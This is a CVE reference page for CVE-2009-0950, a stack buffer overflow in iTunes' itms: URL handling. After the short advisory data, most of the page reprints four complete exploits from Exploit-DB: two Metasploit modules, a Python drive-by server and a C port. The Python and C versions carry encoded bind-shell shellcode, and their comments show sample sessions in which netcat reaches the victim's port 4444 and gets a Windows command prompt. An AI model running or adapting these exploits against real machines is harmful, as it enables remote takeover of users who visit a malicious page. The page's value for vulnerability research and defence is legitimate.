Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack-based buffer overflow in Apple iTunes before 8.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an itms: URL with a long URL component after a colon.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16296
Publication date : 2010-11-10 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: itms_overflow.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
'Description' => %q{
This modules exploits a stack-based buffer overflow in iTunes
itms:// URL parsing. It is accessible from the browser and
in Safari, itms urls will be opened in iTunes automatically.
Because iTunes is multithreaded, only vfork-based payloads should
be used.
},
'Author' => [ 'Will Drewry <redpig [at] dataspill.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-0950' ],
[ 'OSVDB', '54833' ],
[ 'URL', 'http://support.apple.com/kb/HT3592' ],
[ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]
],
'Payload' =>
{
'Space' => 1024, # rough estimate of what browsers will pass.
'DisableNops' => true, # don't pad out the space.
'BadChars' => '',
# The encoder must be URL-safe otherwise it will be automatically
# URL encoded.
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX', # See the comments below
'BufferOffset' => 3, # See the comments below
},
},
'Targets' =>
[
[
'OS X',
{
'Platform' => [ 'osx' ],
'Arch' => ARCH_X86,
'Addr' => 'ATe'
},
]
],
'DisclosureDate' => 'Jun 01 2009',
'DefaultTarget' => 0))
end
# Generate distribution script, which calls our payload using JavaScript.
def generate_itms_page(p)
# Set the base itms url.
# itms:// or itmss:// can be used. The trailing colon is used
# to start the attack. All data after the colon is copied to the
# stack buffer.
itms_base_url = "itms://:"
itms_base_url << rand_text_alpha(268) # Fill up the real buffer
itms_base_url << rand_text_alpha(16) # $ebx, $esi, $edi, $ebp
itms_base_url << target['Addr'] # hullo there, jmp *%ecx!
# The first '/' in the buffer will terminate the copy to the stack buffer.
# In addition, $ecx will be left pointing to the last 6 bytes of the heap
# buffer containing the full URL. However, if a colon and a ? occur after
# the value in ecx will point to that point in the heap buffer. In our
# case, it will point to the beginning. The ! is there to make the
# alphanumeric shellcode execute easily. (This is why we need an offset
# of 3 in the payload).
itms_base_url << "/:!?" # Truncate the stack buffer overflow and prep for payload
itms_base_url << p # Wooooooo! Payload time.
# We drop on a few extra bytes as the last few bytes can sometimes be
# corrupted.
itms_base_url << rand_text_alpha(4)
# Use the pattern creator to simplify exploit creation :)
# itms_base_url << Rex::Text.pattern_create(1024,
# Rex::Text::DefaultPatternSets)
# Return back an example URL. Using an iframe doesn't work with all
# browsers, but that's easy enough to fix if you need to.
return String(<<-EOS)
<html><head><title>iTunes loading . . .</title></head>
<body>
<script>document.location.assign("#{itms_base_url}");</script>
<p>iTunes should open automatically, but if it doesn't, click to
<a href="#{itms_base_url}">continue</a>.</p>a
</body>
</html>
EOS
end
def on_request_uri(cli, request)
print_status("Generating payload...")
return unless (p = regenerate_payload(cli))
#print_status("=> #{payload.encoded}")
print_status("=> #{payload.encoded.length} bytes")
print_status("Generating HTML container...")
page = generate_itms_page(payload.encoded)
#print_status("=> #{page}")
print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
header = { 'Content-Type' => 'text/html' }
send_response_html(cli, page, header)
handler(cli)
end
end
Exploit Database EDB-ID : 8861
Publication date : 2009-06-02 22h00 +00:00
Author : Will Drewry
EDB Verified : Yes
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
'Description' => %q{
This modules exploits a stack-based buffer overflow in iTunes
itms:// URL parsing. It is accessible from the browser and
in Safari, itms urls will be opened in iTunes automatically.
Because iTunes is multithreaded, only vfork-based payloads should
be used.
},
'Author' => [ 'Will Drewry <redpig@dataspill.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['CVE', 'CVE-2009-0950'],
['URL', 'http://support.apple.com/kb/HT3592'],
['URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html'],
],
'Payload' =>
{
'Space' => 1024, # rough estimate of what browsers will pass.
'DisableNops' => true, # don't pad out the space.
'BadChars' => '',
# The encoder must be URL-safe otherwise it will be automatically
# URL encoded.
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX', # See the comments below
'BufferOffset' => 3, # See the comments below
},
},
'Targets' =>
[
[
'OS X',
{
'Platform' => [ 'osx' ],
'Arch' => ARCH_X86,
'Addr' => 'ATe'
},
],
[
'Windows (not done yet)',
{
'Platform' => [ 'win' ],
'Arch' => ARCH_X86,
'Addr' => 'CCCC'
},
],
],
'DisclosureDate' => 'June 1, 2009',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
], self.class)
end
# Generate distribution script, which calls our payload using JavaScript.
def generate_itms_page(p)
# Set the base itms url.
# itms:// or itmss:// can be used. The trailing colon is used
# to start the attack. All data after the colon is copied to the
# stack buffer.
itms_base_url = "itms://:"
itms_base_url << "A"*268 # Fill up the real buffer
itms_base_url << "XXXXAAAAZZZZYYYY" # $ebx, $esi, $edi, $ebp
itms_base_url << target['Addr'] # hullo there, jmp *%ecx!
# The first '/' in the buffer will terminate the copy to the stack buffer.
# In addition, $ecx will be left pointing to the last 6 bytes of the heap
# buffer containing the full URL. However, if a colon and a ? occur after
# the value in ecx will point to that point in the heap buffer. In our
# case, it will point to the beginning. The ! is there to make the
# alphanumeric shellcode execute easily. (This is why we need an offset
# of 3 in the payload).
itms_base_url << "/:!?" # Truncate the stack overflow and prep for payload
itms_base_url << p # Wooooooo! Payload time.
# We drop on a few extra bytes as the last few bytes can sometimes be
# corrupted.
itms_base_url << "AAAA"
# Use the pattern creator to simplify exploit creation :)
# itms_base_url << Rex::Text.pattern_create(1024,
# Rex::Text::DefaultPatternSets)
# Return back an example URL. Using an iframe doesn't work with all
# browsers, but that's easy enough to fix if you need to.
return String(<<-EOS)
<html><head><title>iTunes loading . . .</title></head>
<body>
<script>document.location.assign("#{itms_base_url}");</script>
<p>iTunes should open automatically, but if it doesn't, click to
<a href="#{itms_base_url}">continue</a>.</p>
</body>
</html>
EOS
end
def on_request_uri(cli, request)
print_status("Generating payload...")
return unless (p = regenerate_payload(cli))
#print_status("=> #{payload.encoded}")
print_status("=> #{payload.encoded.length} bytes")
print_status("Generating HTML container...")
page = generate_itms_page(payload.encoded)
#print_status("=> #{page}")
print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
header = { 'Content-Type' => 'text/html' }
send_response_html(cli, page, header)
handler(cli)
end
end
# milw0rm.com [2009-06-03]
Exploit Database EDB-ID : 8934
Publication date : 2009-06-11 22h00 +00:00
Author : ryujin
EDB Verified : Yes
#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
from socket import *
html = """
<html>
<head><title>iTunes loading . . .</title>
<script>
function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
function prepareStack(){document.location.assign("%s");}
function ownSeh(){document.location.assign("%s");}
function ipwn(){
prepareStack();
ownSeh();
}
function main() {
openiTunes();
// Increase this timeout if your iTunes takes more time to load!
setTimeout('ipwn()',20000);
}
</script>
</head>
<body onload="main();">
<p align="center">
<b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>
</p>
<p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
<p align="center"><b>www.offensive-security.com</b></p>
<p align="center">
iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)<br/>
If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
function.
<br/>
<h2 align="center">
<b><u>This exploit works if opened from Firefox not from IE!</u></b>
</h2>
<p align="center">
After exploitation iTunes crashes, you need to kill it from TaskManager
<br/>have fun!</br>
</p>
</p>
</body>
</html>"""
# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1 = "\x41"*425
# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10
# Padding
pad0x2 = "\x41"*570
# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"
# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7
# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162
# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)
print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()
# milw0rm.com [2009-06-12]
Exploit Database EDB-ID : 11138
Publication date : 2010-01-13 23h00 +00:00
Author : Simo36
EDB Verified : Yes
/* iTunes-CVE09-s36.c
*
* Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)
*
* Coded By :
* .:: [ Simo36 ] ::.
*
* Contact : Overflows@hotmail.com
* His0k4.hlm@gmail.com
*
* Home : www.sec-r1z.com
*
* Tested on : Win XP SP/SP3 Frensh , Win2k pro SP4 english
*
* Thanks To : Ryujin & Stack & r1z
*
* finally I want to thanks mr ryujin for printable shellcode and jump back .
*
*----------------------------------------------------------
* C:\Documents and Settings\Administrateur\Bureau\exploit>iTunes-CVE09-s36..exe
*
* [+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950
*
* [+] By : Simo36 & His0k4 ( Overflows@hotmail.com )
*
* [+] Home : www.sec-r1z.com
* [+] Listen on port 80
*
* [+] Connection accepted from 127.0.0.1:1097
*
* [x] Sendin welcome information....Done
*
* [+] sending the evil packet ...[+] Done !
*
* [+] check port 4444 with netcat
*
* [+] Connection Closed
*
*
*
*----------------------------------------------------------------
* C:\Documents and Settings\Administrateur\Bureau\exploit>nc -v 196.217.232.130 4444
* sweet-9fc9abcd4 [196.217.232.130] 4444 (?) open
* Windows XP Sweet 5.1 [SP3 v5.1.2600]
*(C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Program Files\Mozilla Firefox>
*
*
*
*
*
*
* Note : This vulnerability can't be exploited with simply return address Because
* it is affected with GS Flag .
*
* Compiler : Dev-C++ & mingw
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#define Max_BUFF 2037
#define PORT 80
char header1[]=
"<html>\n"
" <head><title>iTunes Remote Exploit</title>\n"
" <script>\n"
" function openiTunes(){document.location.assign('itms://itunes.apple.com/');}\n"
" function prepareStack(){document.location.assign('";
char header2[]=
"');}\n function ownSeh(){document.location.assign('";
char header3[]=
"');}\n function ipwn(){\n"
" prepareStack();\n ownSeh();\n }"
"\n function main() {\n openiTunes(); \n"
" setTimeout('ipwn()',20000);\n }\n";
char header4[]=
" </script>\n"
" </head>\n"
"<body onload='main();'>\n"
"<html>\n"
"<head>\n"
" <title></title>\n"
"</head>\n"
"<body style='color: rgb(0, 0, 0);' onload='main();'\n"
" alink='#ee0000' link='#0000ee' vlink='#551a8b'>\n"
"<p align='center'><b>Apple iTunes 8.1.1.10 (daap)\n"
"BOF remote exploit </b></p>\n"
"<p align='center'><a\n"
" href='http://dvlabs.tippingpoint.com/advisory/TPTI-09-03'><b>\n"
"CVE-2009-0950</b></a>\n"
"</p>\n"
"<p align='center'><span style='font-weight: bold;'>Exploited\n"
"by : Simo36 { Overflows [AT] Hotmail [DOT] com }</span></p>\n"
"<p align='center'><span style='font-weight: bold;'></span></p>\n"
"<p align='center'><b>www.sec-r1z.com</b></p>\n"
"<p align='center'>based on the code found by Matteo\n"
"Memelli <br>\n"
"</p>\n"
"<h2 align='center'><b><u>This exploit works if\n"
"opened from Firefox only!</u></b>\n"
"</h2>\n"
"<p align='center'>\n"
"After exploitation iTunes crashes, you need to kill it from TaskManager\n"
"<br>\n"
"have fun!</p>\n"
"<p align='center'><br>\n"
"</p>\n"
"<p></p>\n"
"</body>\n"
"</html>\n";
// printable shellcode via EDX
unsigned char shellcode[]=
"VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA";
// ascii printable jump code (alpha2)
char jump_code[]= "\x55\x59\x43\x43\x43\x43\x43\x43\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x5a\x49\x45\x35\x6a\x5a\x4b\x4f\x4b\x4f\x41";
// pop EDX from Stack and Incrasing it
char align_stack[]= "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x54\x5a\x42\x42\x42\x42\x42\x42\x56\x56\x56\x56\x56\x56\x56"//
"\x56\x56\x56";
int main(void){
struct sockaddr_in server,client;
FILE *p;
WSADATA wsa;
SOCKET sock1,sock2;
int res;
char sdinfo[]="200\n\r";
char szRecvBuff[0x100];
char url2[Max_BUFF];
char url1[210];
char payload[7000];
int i=0;
system("cls");
printf("\n[+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950\n\n");
printf("[+] By : \t\tSimo36 & His0k4 ( Overflows@hotmail.com ) \n\n");
printf("[+] Home :\t\t www.sec-r1z.com\n");
if(WSAStartup(MAKEWORD(1 ,1),&wsa) !=0){
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
return;
}
sock1 = socket(AF_INET,SOCK_STREAM,0);
server.sin_family = AF_INET;
server.sin_port= htons(PORT);
server.sin_addr.s_addr=0;
res = bind(sock1,(struct sockaddr *)&server ,sizeof(server));
res = listen(sock1, 100);
printf("[+] Listen on port 80 \n\n");
while(1){
res = sizeof(client);
sock2 = accept(sock1, (struct sockaddr *)&client, &res);
printf("[+] Connection accepted from %s:%d\n\n",
inet_ntoa(client.sin_addr), ntohs(client.sin_port));
printf("[x] Sendin welcome information....");
if(send(sock2,sdinfo,strlen(sdinfo),0) !=-1){
Sleep(1000);
printf("Done\n");
res = recv(sock2, szRecvBuff, sizeof(szRecvBuff), 0);
res=recv(sock2,sdinfo,strlen(sdinfo),0);
szRecvBuff[res-1] = '\x0';
/**** ITMS URL ****/
memset(url1,0x41,strlen(url1));
strcpy(&url1[0],"itms://:");
memset(&url1[8],0x42,200);
strcpy(&url1[208],"/");
// Second url
memset(url2,0x42,strlen(url2));
strcpy(&url2[0],"daap://:");
// some padd
memset(&url2[8],0x41,425);
// align with push esp and pop edx
strcpy(&url2[433],align_stack);
// Shellcode Ready !
strcpy(&url2[496],shellcode);
memset(&url2[1226],0x41,570);
strcpy(&url2[1796],"\x61\x45\x45\x45");
strcpy(&url2[1800],"\x2a\x5e\x21\x67");// Thanks Riyujin for this
strcpy(&url2[1804],"DEEEEEEE");
strcpy(&url2[1812],jump_code);
memset(&url2[1875],0x43,161);
strcpy(&url2[2036],"C");
// building exploit
memset(payload,0x41,7000);
strcpy(&payload[0],header1);
// evil packet is ready now :)
strcpy(&payload[strlen(header1)],url1);
strcpy(&payload[strlen(header1)+strlen(url1)],header2);
strcpy(&payload[strlen(header1)+strlen(url1)+strlen(header2)],url2);
strcpy(&payload[strlen(header1)+strlen(url1)+strlen(header2)+strlen(url2)],header3);
strcpy(&payload[strlen(header1)
+strlen(url1)+strlen(header2)+strlen(url2)+strlen(header3)],header4);
printf("\n[+] sending the evil packet ...");
if(send(sock2,payload,strlen(payload),0) !=-1){
res=recv(sock2,payload,strlen(payload),0);
sleep(100);
closesocket(sock2);
printf("[+] Done ! \n\n");
printf("[+] check port 4444 with netcat \n\n");
printf("[+] Connection Closed\n\n");
}else printf ("[-] Error on sending payload !");
}else printf("Error\n");
exit(0);
}
WSACleanup();
return 0x0;
}
Products Mentioned
Configuraton 0
Apple>>Itunes >> Version To (including) 8.1.1
- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
Apple>>Itunes >> Version To (including) 8.1.1
- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
Apple>>Itunes >> Version 1.0
Apple>>Itunes >> Version 1.0
Apple>>Itunes >> Version 1.0
Apple>>Itunes >> Version 1.0
Apple>>Itunes >> Version 1.1
Apple>>Itunes >> Version 1.1.1
Apple>>Itunes >> Version 1.1.1
Apple>>Itunes >> Version 1.1.1
Apple>>Itunes >> Version 1.1.1
Apple>>Itunes >> Version 1.1.2
Apple>>Itunes >> Version 1.1.2
Apple>>Itunes >> Version 1.1.2
Apple>>Itunes >> Version 1.1.2
Apple>>Itunes >> Version 2.0
Apple>>Itunes >> Version 2.0
Apple>>Itunes >> Version 2.0
Apple>>Itunes >> Version 2.0
Apple>>Itunes >> Version 2.0.1
Apple>>Itunes >> Version 2.0.1
Apple>>Itunes >> Version 2.0.1
Apple>>Itunes >> Version 2.0.1
Apple>>Itunes >> Version 2.0.2
Apple>>Itunes >> Version 2.0.2
Apple>>Itunes >> Version 2.0.2
Apple>>Itunes >> Version 2.0.2
Apple>>Itunes >> Version 2.0.3
Apple>>Itunes >> Version 2.0.3
Apple>>Itunes >> Version 2.0.3
Apple>>Itunes >> Version 2.0.3
Apple>>Itunes >> Version 2.0.4
Apple>>Itunes >> Version 2.0.4
Apple>>Itunes >> Version 2.0.4
Apple>>Itunes >> Version 2.0.4
Apple>>Itunes >> Version 3.0
Apple>>Itunes >> Version 3.0
Apple>>Itunes >> Version 3.0.1
Apple>>Itunes >> Version 3.0.1
Apple>>Itunes >> Version 4.0
Apple>>Itunes >> Version 4.0
Apple>>Itunes >> Version 4.0.0
- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
